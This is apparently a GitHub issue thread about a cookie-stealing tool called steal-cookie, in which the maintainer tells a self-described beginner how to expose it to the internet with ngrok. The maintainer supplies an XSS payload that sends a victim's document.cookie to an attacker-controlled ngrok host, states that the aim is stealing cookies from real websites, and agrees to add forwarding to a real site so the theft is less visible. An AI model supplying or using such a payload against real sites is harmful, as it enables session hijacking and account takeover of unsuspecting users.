### ISSUE TITLE
can we use it over wan 

### ISSUE THREAD

**Issue by pretech86** [knassar702/steal-cookie#1]
can we use it over wan with ngrok?

**Comment by MindPatch** [comment]
Yes sir .. you can use it with ngrok service

## steps :
* run xss.py
* run ngrok using this command ```$ ngrok http 5000```
Good luck

**Comment by pretech86** [comment]
use me i'm a beginner , why you copy this cookie?cookie= and put it beside http://:5000 
and why we open 127.0.0.1:5000 and you not used it , you copy the link directly and change the ip only

**Comment by pretech86** [comment]
now i run the tool and use ngrok http 5000 and open the link of ngrok in another machine but i didn't get any thing ? 

can you help please

**Comment by MindPatch** [comment]
127.0.0.1:5000 this a localhost if you need steal cookies from real website you need open port on your pc for start the service(```http```)  ..and this parameters ```/cookie?cookie=``` 
worked in this payload
``` <script> documen.location = 'http://yourngrokhost.bg/cookie?cookie='+document.cookie</script>```
<p> because the cookie changed for the host .. when i visit google.com my browser by default use the stored cookie for google.com if i redirected from google to Facebook.com my browser don't use The cookie of google but will be use the cookie of Facebook.com .. this the reason we use this parameters :)
You can read about cookie <a href='https://en.m.wikipedia.org/wiki/HTTP_cookie'>Here</a>

In new update for steal-cookie tool i will be add cookie in header after that you can steal any cookie using the url without parameters like this (```http://cookiestealr.com```)

**Comment by pretech86** [comment]
so when you will update it :) , also can you make it forward to a real website ?

**Comment by MindPatch** [comment]
Yes
